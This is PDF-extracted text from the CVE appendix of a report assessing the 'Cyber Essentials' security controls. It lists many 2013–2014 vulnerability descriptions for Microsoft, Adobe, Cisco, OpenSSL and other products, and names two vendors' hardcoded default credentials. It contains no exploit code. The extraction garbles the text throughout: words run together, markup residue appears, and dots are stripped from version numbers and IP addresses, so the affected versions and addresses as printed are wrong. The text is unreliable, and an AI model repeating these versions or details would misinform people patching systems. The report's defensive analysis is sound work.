CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
ContentsExecutive Summary 2
Introduction 3Aims 3
Methodology 4Data Collection 4Vulnerabilities 4Mitigation Assessment 5
Analysis 6Full Vulnerabilities Assessment 6Case Studies 6Survey Responses 8
Analysis of Cyber Essentials on High Profile Vulnerabilities 10ldquoShellShockrdquo 10ldquoHeartbleedrdquo 10ldquoSuperfishrdquo 10Threat Analysis 11
Conclusions 12Additional Tools 12Cyber Essentials Controls 12Recommendations 12
References 13
Cyber Controls Applicability 14
CVE Details 19
Survey Responses 27
Executive SummaryFindings
This report assesses the Cyber Essentialscontrols effectiveness in mitigating cyber-threats
